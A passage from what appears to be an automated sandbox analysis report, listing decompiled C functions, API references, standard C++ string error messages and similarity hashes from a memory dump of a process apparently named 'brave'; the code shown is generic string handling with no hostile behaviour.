				 *((intOrPtr*)(_t165 + 0x144)) = 0;
				 *((long long*)(_t165 + 0x180)) = 0;
				_t108 =  *(_t165 + 0x17c) * _t91;
				_t139 =  <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c));
				_t140 = ( <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c))) << 4;
				 *(_t165 + 0x17c) = _t108;
				E00007FF67FF6A600F680(_t91);
				_t170 = _t169 - _t140;
				_t94 =  >  ? _t108 : 1;
				E00007FF67FF6A600F680(_t140);
				 *((long long*)(_t165 + 0x160)) = _t170 + 0x20;
				 *((long long*)(_t165 + 0x170)) = _t170 - (_t140 << 4) + 0x20;
				E00007FF67FF6A600BFE0(_t184, _t137);
				 *((char*)(_t165 +  *((intOrPtr*)(_t165 + 0x110)) + 0x10)) = 0;
				 *((intOrPtr*)(_t165 + 0x120))();
				return 0 |  *((intOrPtr*)(_t165 + 0x140)) == 0x00000000;
			}

0x7ff6a600d76c
0x7ff6a600d773
0x7ff6a600d77b
0x7ff6a600d788
0x7ff6a600d78c
0x7ff6a600d7a1
0x7ff6a600d7a6
0x7ff6a600d7a8
0x7ff6a600d7ad
0x7ff6a600d7b7
0x7ff6a600d7b9
0x7ff6a600d7c5
0x7ff6a600d7c9
0x7ff6a600d7cb
0x7ff6a600d7d2
0x7ff6a600d7da
0x7ff6a600d7e3
0x7ff6a600d7e8
0x7ff6a600d7f2
0x7ff6a600d7f9
0x7ff6a600d7fd
0x7ff6a600d803
0x7ff6a600d807
0x7ff6a600d80b
0x7ff6a600d812
0x7ff6a600d815
0x7ff6a600d81c
0x7ff6a600d824
0x7ff6a600d82c
0x7ff6a600d83b
0x7ff6a600d84b
0x7ff6a600d850
0x7ff6a600d856
0x7ff6a600d872
0x7ff6a600d877
0x7ff6a600d87a
0x7ff6a600d87e
0x7ff6a600d883
0x7ff6a600d88b
0x7ff6a600d891
0x7ff6a600d898
0x7ff6a600d89e
0x7ff6a600d8a7
0x7ff6a600d8ab
0x7ff6a600d8b2
0x7ff6a600d8bb
0x7ff6a600d8bf
0x7ff6a600d8c3
0x7ff6a600d8c8
0x7ff6a600d8cc
0x7ff6a600d8d3
0x7ff6a600d8d9
0x7ff6a600d8e5
0x7ff6a600d8ee
0x7ff6a600d8f4
0x7ff6a600d904
0x7ff6a600d90c
0x7ff6a600d923
0x7ff6a600d929
0x7ff6a600d938
0x7ff6a600d93d
0x7ff6a600d940
0x7ff6a600d944
0x7ff6a600d94b
0x7ff6a600d954
0x7ff6a600d95a
0x7ff6a600d961
0x7ff6a600d96b
0x7ff6a600d972
0x7ff6a600d97d
0x7ff6a600d984
0x7ff6a600d98f
0x7ff6a600d99a
0x7ff6a600d9a5
0x7ff6a600d9b0
0x7ff6a600d9ba
0x7ff6a600d9c5
0x7ff6a600d9d0
0x7ff6a600d9db
0x7ff6a600d9e6
0x7ff6a600d9f1
0x7ff6a600da00
0x7ff6a600da02
0x7ff6a600da21
0x7ff6a600da2c
0x7ff6a600da31
0x7ff6a600da35
0x7ff6a600da39
0x7ff6a600da3f
0x7ff6a600da44
0x7ff6a600da4b
0x7ff6a600da59
0x7ff6a600da66
0x7ff6a600da78
0x7ff6a600da7f
0x7ff6a600da98
0x7ff6a600da9d
0x7ff6a600dac6

APIs

strlen.MSVCRT ref: 00007FF6A600D7E3
strlen.MSVCRT ref: 00007FF6A600D8C3
strlen.MSVCRT ref: 00007FF6A600D938

Strings

_GLOBAL_, xrefs: 00007FF6A600D797

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction ID: 578cb9fe4fcad3cccc6e86fcbdf18bf57ea9d4f1fd2d3e3d21f65e2c2d9a6fb5
Opcode Fuzzy Hash: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction Fuzzy Hash: 3BD12732A0A6C688F7608F3199143FE3BA2EB05B98F454035DA4D977C9CF7D95A5C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601D8C0 Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction ID: 54cc7da7f47a351da16b4c3f9abe4cfcfe5dbfe49fe2548808bcd82489199810
Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction Fuzzy Hash: DE91A172E0A25286E7658F29825437A67A1BB04F98F548231CE0D977C4DF7EE8A1C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601AD10 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction ID: 0cf6b80de1dd7408530c4e8e13f21900af1180746b0778eb565fdf0e4a1ef18f
Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction Fuzzy Hash: 3E91A472E0A25286E7668F2983043396BE1EB04F9CF548135CE1D973C5DF3EE9A18760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6029C50 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6029C50(void* __eflags, long long* __rcx, signed char* __rdx, long long __r8) {
				long long _v32;
				signed int _t6;
				long long _t15;

				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				if (__eflags == 0) goto 0xa6029c75;
				if (__rdx == 0) goto 0xa6029ce4;
				_v32 = __r8;
				if (__r8 - 0xf > 0) goto 0xa6029cb0;
				if (__r8 != 1) goto 0xa6029ca0;
				_t6 =  *__rdx & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = __r8;
				 *((char*)(_t15 + __r8)) = 0;
				return _t6;
			}

0x7ff6a6029c5e
0x7ff6a6029c68
0x7ff6a6029c6e
0x7ff6a6029c73
0x7ff6a6029c75
0x7ff6a6029c7e
0x7ff6a6029c84
0x7ff6a6029c86
0x7ff6a6029c8b
0x7ff6a6029c8e
0x7ff6a6029c92
0x7ff6a6029c9e

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF6A6029CE4, 00007FF6A6029D94, 00007FF6A6029E44

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: basic_string::_M_construct null not valid
API String ID: 0-3522614731
Opcode ID: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction ID: 9f94840f68e546c1f998f836d5ad44329ca086d55cbfc2c3e9cf572275bbefd4
Opcode Fuzzy Hash: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction Fuzzy Hash: A2510372A0AA5180EB21AB26E5001B9B7A0FF49FE4F584471DF9C8B759DE3DD5E2C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6028FA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6028FA0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0xa6028fd2;
				r9d = 0;
				_t3 = E00007FF67FF6A6026C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff6a6028fa5
0x7ff6a6028fa8
0x7ff6a6028fb1
0x7ff6a6028fbc
0x7ff6a6028fc1
0x7ff6a6028fc4
0x7ff6a6028fc9
0x7ff6a6028fd1

Strings

basic_string::_S_construct null not valid, xrefs: 00007FF6A602912A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6028FDC, 00007FF6A602903A, 00007FF6A602909A
basic_string::basic_string, xrefs: 00007FF6A6028FD5, 00007FF6A6029033, 00007FF6A6029093

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction ID: db97cf3884ad1a185355cbd3598c6343d3e660310b9b3a433ec1a8293e05c5d0
Opcode Fuzzy Hash: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction Fuzzy Hash: 144105A2F0764681FE11AB62E6547B963A1AF65FC4F444431CF0C8B386EE2DD5E5C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6028980 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6028980(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0xa60289b2;
				r9d = 0;
				_t3 = E00007FF67FF6A6026C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff6a6028985
0x7ff6a6028988
0x7ff6a6028991
0x7ff6a602899c
0x7ff6a60289a1
0x7ff6a60289a4
0x7ff6a60289a9
0x7ff6a60289b1

Strings

basic_string::_S_construct null not valid, xrefs: 00007FF6A6028B0A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A60289BC, 00007FF6A6028A1A, 00007FF6A6028A7A
basic_string::basic_string, xrefs: 00007FF6A60289B5, 00007FF6A6028A13, 00007FF6A6028A73

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction ID: 2938161d01196fc230cc5bacd150a8130783959797d7e36866aaa6cc17a8f800
Opcode Fuzzy Hash: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction Fuzzy Hash: 5641F0A2F0764681FF11AB61E6557B9A291AF69F84F444431CF0C8B38AEE2DC5E58340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602F340 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF6A602F340(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx >> 1 -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0xa602f36d;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF6A602DEF0(_t5, _t6, __rcx, __rdx -  *__rcx >> 1,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff6a602f358
0x7ff6a602f35a
0x7ff6a602f35f
0x7ff6a602f36c

APIs

wcslen.MSVCRT ref: 00007FF6A602F3A5

Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DF96
Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DFC1

Strings

basic_string::replace, xrefs: 00007FF6A602F373, 00007FF6A602F3D6, 00007FF6A602F418, 00007FF6A602F45C, 00007FF6A602F4D5
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602F37A, 00007FF6A602F3DD, 00007FF6A602F41F, 00007FF6A602F463, 00007FF6A602F4C3, 00007FF6A602F4DC, 00007FF6A602F523
basic_string::insert, xrefs: 00007FF6A602F4BC, 00007FF6A602F51C

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 1844840824-3628603605
Opcode ID: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction ID: 1e618f1d2620945bf8cf6b22990f84bb9a470638a05cb7791833084d6f2fb76f
Opcode Fuzzy Hash: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction Fuzzy Hash: 0C410A62E0768681DA10EB35DE408ADA361FF6AFC4F804076DE4C83756EE2ED5A5C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602C170 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF6A602C170(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0xa602c19a;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF6A602AE20(_t5, _t6, __rcx, __rdx -  *__rcx,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff6a602c185
0x7ff6a602c187
0x7ff6a602c18c
0x7ff6a602c199

APIs

strlen.MSVCRT ref: 00007FF6A602C1D5

Part of subcall function 00007FF6A602AE20: memcpy.MSVCRT ref: 00007FF6A602AEC5
Part of subcall function 00007FF6A602AE20: memcpy.MSVCRT ref: 00007FF6A602AEF0

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602C1A7, 00007FF6A602C20D, 00007FF6A602C24F, 00007FF6A602C293, 00007FF6A602C2F5, 00007FF6A602C30E, 00007FF6A602C353
basic_string::insert, xrefs: 00007FF6A602C2EE, 00007FF6A602C34C
basic_string::replace, xrefs: 00007FF6A602C1A0, 00007FF6A602C206, 00007FF6A602C248, 00007FF6A602C28C, 00007FF6A602C307

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 2619041689-3628603605
Opcode ID: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction ID: 9bbb8609ed31dd933331042d87c4e664d995970665d02db1c90cc5962b401e67
Opcode Fuzzy Hash: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction Fuzzy Hash: B04127A1A0BA8681EA40DB75DA408A96361FF66FC4F804032DF0CA7756EF2DD5A6C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602EEA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF6A602EF05
memcpy.MSVCRT ref: 00007FF6A602EFDA

Strings

basic_string::append, xrefs: 00007FF6A602EF5D, 00007FF6A602F039
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602EF64

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction ID: 46088277d9aa01f4e3e669e6b8c27dfd051be256b308cb1948b6569bd6d2cd6d
Opcode Fuzzy Hash: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction Fuzzy Hash: 0C41E1A2B9AA5580DA10DB39D5488BE6364FF45FC4B844172EF1D833A1EF3EE1A1C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602BCF0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF6A602BD55
memcpy.MSVCRT ref: 00007FF6A602BE27

Strings

basic_string::append, xrefs: 00007FF6A602BDB2, 00007FF6A602BE7C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602BDB9

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction ID: 852aedf0b3b2d9077c31c73fb35a8e68f2e6e5f89f7a130bc35dcab548103c3d
